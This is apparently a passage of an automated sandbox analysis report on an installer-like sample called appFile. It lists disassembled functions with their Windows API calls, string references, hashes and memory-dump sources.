                                                                                                                                        • Associated: 00000000.00000002.1686875805.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686972296.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686972296.000000000050A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686972296.0000000000517000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_appFile.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Char$Next$Prev
                                                                                                                                        • String ID: *?|<>/":
                                                                                                                                        • API String ID: 589700163-165019052
                                                                                                                                        • Opcode ID: 45da571b5baffeb551c3f596f843ba1ccba930a874212f5238eaf5e1151c3a30
                                                                                                                                        • Instruction ID: be175804d259169a812840791ea7ca7df426672d81dd27f3292f2fdf866f60ab
                                                                                                                                        • Opcode Fuzzy Hash: 45da571b5baffeb551c3f596f843ba1ccba930a874212f5238eaf5e1151c3a30
                                                                                                                                        • Instruction Fuzzy Hash: E311C81188022159DB30FB698C4497776F8AE55750716843FE9CAF32C1E7BCDC9182BD
                                                                                                                                        Function 0040149D Relevance: 7.6, APIs: 5, Instructions: 67registryCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004014BF
                                                                                                                                        • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 004014FB
                                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 00401504
                                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 00401529
                                                                                                                                        • RegDeleteKeyW.ADVAPI32(?,?), ref: 00401547
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1686861096.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1686846008.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686875805.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686972296.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686972296.000000000050A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686972296.0000000000517000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_appFile.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Close$DeleteEnumOpen
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1912718029-0
                                                                                                                                        • Opcode ID: 2a270dabeadf4e4f1a4763114e85c5fdf2352e77b68d80cc92c62b7e226f3bc1
                                                                                                                                        • Instruction ID: c67b0bc93acae55c3864b02ebd95f02f7c15995ce12be8144693d1f813214158
                                                                                                                                        • Opcode Fuzzy Hash: 2a270dabeadf4e4f1a4763114e85c5fdf2352e77b68d80cc92c62b7e226f3bc1
                                                                                                                                        • Instruction Fuzzy Hash: EB117976500008FFDF119F90ED859AA3B7AFB84348F004476FA0AB5070D3358E509A29
                                                                                                                                        Function 004022FD Relevance: 7.6, APIs: 5, Instructions: 56memoryCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 0040230C
                                                                                                                                        • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 0040232E
                                                                                                                                        • GetFileVersionInfoW.VERSION(?,?,?,00000000), ref: 00402347
                                                                                                                                        • VerQueryValueW.VERSION(?,00409838,?,?,?,?,?,00000000), ref: 00402360
                                                                                                                                          • Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A
                                                                                                                                        • GlobalFree.KERNEL32(008CAFB8), ref: 00402387
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1686861096.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1686846008.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686875805.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686972296.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686972296.000000000050A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686972296.0000000000517000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_appFile.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FileGlobalInfoVersion$AllocFreeQuerySizeValuewsprintf
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3376005127-0
                                                                                                                                        • Opcode ID: 606da6def6221d12ef1392d662ca92edf1c337adf5941d48ecd243ca57024968
                                                                                                                                        • Instruction ID: 214764af72b390ffa64cdeb44d1c6cd0e8ca06a9e3a7070d0c65f9f565939ffa
                                                                                                                                        • Opcode Fuzzy Hash: 606da6def6221d12ef1392d662ca92edf1c337adf5941d48ecd243ca57024968
                                                                                                                                        • Instruction Fuzzy Hash: 0D112572A0010AAFDF00EFA1D9459AEBBB8EF08344B10447AF606F61A1D7798A40CB18
                                                                                                                                        Function 00402B23 Relevance: 7.6, APIs: 5, Instructions: 54memoryfilestringCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • GlobalAlloc.KERNEL32(00000040,00002004), ref: 00402B2B
                                                                                                                                        • WideCharToMultiByte.KERNEL32(?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B61
                                                                                                                                        • lstrlenA.KERNEL32(?,?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B6A
                                                                                                                                        • WriteFile.KERNEL32(00000000,?,?,00000000,?,?,?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B85
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1686861096.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1686846008.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686875805.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686972296.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686972296.000000000050A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686972296.0000000000517000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_appFile.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AllocByteCharFileGlobalMultiWideWritelstrlen
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2568930968-0
                                                                                                                                        • Opcode ID: 8e94f5e6955cf742f0be7e70fe548515adb6d38661ae1e1cc5866dac39eea37a
                                                                                                                                        • Instruction ID: eb70b36e00a6049791e454e439637436730f967712bedb277b0d85a94317bb29
                                                                                                                                        • Opcode Fuzzy Hash: 8e94f5e6955cf742f0be7e70fe548515adb6d38661ae1e1cc5866dac39eea37a
                                                                                                                                        • Instruction Fuzzy Hash: 7F016171600205FFEB14AF60DD4CE9E3B78EB05359F10443AF606B91E2D6799D81DB68
                                                                                                                                        Function 0040209F Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • GetDlgItem.USER32(?), ref: 004020A3
                                                                                                                                        • GetClientRect.USER32(00000000,?), ref: 004020B0
                                                                                                                                        • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 004020D1
                                                                                                                                        • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 004020DF
                                                                                                                                        • DeleteObject.GDI32(00000000), ref: 004020EE
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1686861096.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1686846008.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686875805.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686972296.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686972296.000000000050A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686972296.0000000000517000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_appFile.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1849352358-0
                                                                                                                                        • Opcode ID: 06a5835b44d3b6ac96e348dee9128c473dfe3a95b4f6450d10307ae5d6bb1818
                                                                                                                                        • Instruction ID: 8f71947f799b2f64a69df86d2a8dcb393400c967cd863db52f2ee5b4f8782dab
                                                                                                                                        • Opcode Fuzzy Hash: 06a5835b44d3b6ac96e348dee9128c473dfe3a95b4f6450d10307ae5d6bb1818
                                                                                                                                        • Instruction Fuzzy Hash: 9DF012B2A00104BFE700EBA4EE89DEFBBBCEB04305B104575F502F6162C6759E418B28
                                                                                                                                        Function 00401F80 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401FE6
                                                                                                                                        • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401FFE
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1686861096.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1686846008.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686875805.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686972296.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686972296.000000000050A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686972296.0000000000517000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_appFile.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessageSend$Timeout
                                                                                                                                        • String ID: !
                                                                                                                                        • API String ID: 1777923405-2657877971
                                                                                                                                        • Opcode ID: e47ff439633ded3fb17ec5eecd0e1b6806a5c9fa211e2190a11df636c871b995
                                                                                                                                        • Instruction ID: 6a5c1514d43e21eed083d94b15ba6593763dc9af2b3e6337d8774d5f4809249f
                                                                                                                                        • Opcode Fuzzy Hash: e47ff439633ded3fb17ec5eecd0e1b6806a5c9fa211e2190a11df636c871b995
                                                                                                                                        • Instruction Fuzzy Hash: 56217171900209BADF15AFB4D886ABE7BB9EF04349F10413EF602F60E2D6794A40D758
                                                                                                                                        Function 004043D9 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 73stringCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • lstrlenW.KERNEL32(00451D98,%u.%u%s%s,?,00000000,00000000,?,FFFFFFDC,00000000,?,000000DF,00451D98,?), ref: 00404476
                                                                                                                                        • wsprintfW.USER32 ref: 00404483
                                                                                                                                        • SetDlgItemTextW.USER32(?,00451D98,000000DF), ref: 00404496
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1686861096.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1686846008.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686875805.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686972296.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686972296.000000000050A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686972296.0000000000517000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_appFile.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ItemTextlstrlenwsprintf
                                                                                                                                        • String ID: %u.%u%s%s
                                                                                                                                        • API String ID: 3540041739-3551169577
                                                                                                                                        • Opcode ID: a810ffe09f2dc908503b2f58e47bd406bb4654f19e43ddd30bdf0acdc5011288
                                                                                                                                        • Instruction ID: 019992b557dc20c415266b5889428492ee6a52d86c3b4952972254649920ef77
                                                                                                                                        • Opcode Fuzzy Hash: a810ffe09f2dc908503b2f58e47bd406bb4654f19e43ddd30bdf0acdc5011288
                                                                                                                                        • Instruction Fuzzy Hash: DC11527270021477CF10AA699D45F9E765EEBC5334F10423BF519F31E1D6388A158259
                                                                                                                                        Function 004027E3 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 60registryCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00401553: RegOpenKeyExW.ADVAPI32(?,00000000,00000022,00000000,?,?), ref: 0040158B
                                                                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 0040282E
                                                                                                                                        • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040280E
                                                                                                                                          • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                          • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                        Strings
                                                                                                                                        • DeleteRegValue: "%s\%s" "%s", xrefs: 00402820
                                                                                                                                        • DeleteRegKey: "%s\%s", xrefs: 00402843
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1686861096.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1686846008.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686875805.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686972296.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686972296.000000000050A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686972296.0000000000517000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_appFile.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CloseDeleteOpenValuelstrlenwvsprintf
                                                                                                                                        • String ID: DeleteRegKey: "%s\%s"$DeleteRegValue: "%s\%s" "%s"
                                                                                                                                        • API String ID: 1697273262-1764544995
                                                                                                                                        • Opcode ID: 1c7787f783619d22a727722e8428d119ca1e8f511c7c384e8364c1fbbf216132
                                                                                                                                        • Instruction ID: 70287f52249eeba914cab3bee2f8f529b2cd5257afac1a85b0186071c419a2a5
                                                                                                                                        • Opcode Fuzzy Hash: 1c7787f783619d22a727722e8428d119ca1e8f511c7c384e8364c1fbbf216132
                                                                                                                                        • Instruction Fuzzy Hash: 2511E732E00200ABDB10FFA5DD4AABE3A64EF40354F10403FF50AB61D2D6798E50C6AD
                                                                                                                                        Function 00402665 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 56stringCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                          • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                          • Part of subcall function 00406301: FindFirstFileW.KERNELBASE(00461E18,00466A20,00461E18,004067FA,00461E18), ref: 0040630C
                                                                                                                                          • Part of subcall function 00406301: FindClose.KERNEL32(00000000), ref: 00406318
                                                                                                                                        • lstrlenW.KERNEL32 ref: 004026B4
                                                                                                                                        • lstrlenW.KERNEL32(00000000), ref: 004026C1
                                                                                                                                        • SHFileOperationW.SHELL32(?,?,?,00000000), ref: 004026EC
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1686861096.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1686846008.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686875805.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686972296.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686972296.000000000050A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686972296.0000000000517000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_appFile.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: lstrlen$FileFind$CloseFirstOperationwvsprintf
                                                                                                                                        • String ID: CopyFiles "%s"->"%s"
                                                                                                                                        • API String ID: 2577523808-3778932970
                                                                                                                                        • Opcode ID: 0c98d155eaf4bf30867e20e2ef9323f8e108a065a1149d83459e1735f252947f
                                                                                                                                        • Instruction ID: 7c1d43f40acf3f33c375e3424532232737b5c7d4dc38a4161669d523a66d0fcf
                                                                                                                                        • Opcode Fuzzy Hash: 0c98d155eaf4bf30867e20e2ef9323f8e108a065a1149d83459e1735f252947f
                                                                                                                                        • Instruction Fuzzy Hash: 8A114F71D00214AADB10FFF6984699FBBBCAF44354B10843BA502F72D2E67989418759
                                                                                                                                        Function 00406250 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 53stringCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1686861096.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1686846008.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686875805.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686972296.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686972296.000000000050A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686972296.0000000000517000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_appFile.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: lstrcatwsprintf
                                                                                                                                        • String ID: %02x%c$...
                                                                                                                                        • API String ID: 3065427908-1057055748
                                                                                                                                        • Opcode ID: e028bc25539a6ddd5d675d42839d030ce8218c39fe920002d96002040e934ce0
                                                                                                                                        • Instruction ID: 9bf571533c0fd83e5fe1ff618cfd19ea7d9613251e6e948213dceada22d50e27
                                                                                                                                        • Opcode Fuzzy Hash: e028bc25539a6ddd5d675d42839d030ce8218c39fe920002d96002040e934ce0
                                                                                                                                        • Instruction Fuzzy Hash: E201D272510219BFCB01DF98CC44A9EBBB9EF84714F20817AF806F3280D2799EA48794
                                                                                                                                        Function 00405073 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 41comCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • OleInitialize.OLE32(00000000), ref: 00405083
                                                                                                                                          • Part of subcall function 00403DDB: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED
                                                                                                                                        • OleUninitialize.OLE32(00000404,00000000), ref: 004050D1
                                                                                                                                          • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                          • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1686861096.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1686846008.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686875805.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686972296.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686972296.000000000050A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686972296.0000000000517000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_appFile.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: InitializeMessageSendUninitializelstrlenwvsprintf
                                                                                                                                        • String ID: Section: "%s"$Skipping section: "%s"
                                                                                                                                        • API String ID: 2266616436-4211696005
                                                                                                                                        • Opcode ID: 08831c163c79f6045eee3939d78ed76b32885a7039adc7eb93c092c170fa4538
                                                                                                                                        • Instruction ID: 3a4ae3dd184d198318ece42e1af7a5bc75ccdc2bd7a030bb5b2a43e0dda7b67b
                                                                                                                                        • Opcode Fuzzy Hash: 08831c163c79f6045eee3939d78ed76b32885a7039adc7eb93c092c170fa4538
                                                                                                                                        • Instruction Fuzzy Hash: 0EF0F433504300ABE7106766AC02B1A7BA0EF84724F25017FFA09721E2DB7928418EAD
                                                                                                                                        Function 004020F9 Relevance: 6.0, APIs: 4, Instructions: 45COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • GetDC.USER32(?), ref: 00402100
                                                                                                                                        • GetDeviceCaps.GDI32(00000000), ref: 00402107
                                                                                                                                        • MulDiv.KERNEL32(00000000,00000000), ref: 00402117
                                                                                                                                          • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00425976,74DF23A0,00000000), ref: 00406902
                                                                                                                                        • CreateFontIndirectW.GDI32(00420110), ref: 0040216A
                                                                                                                                          • Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1686861096.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
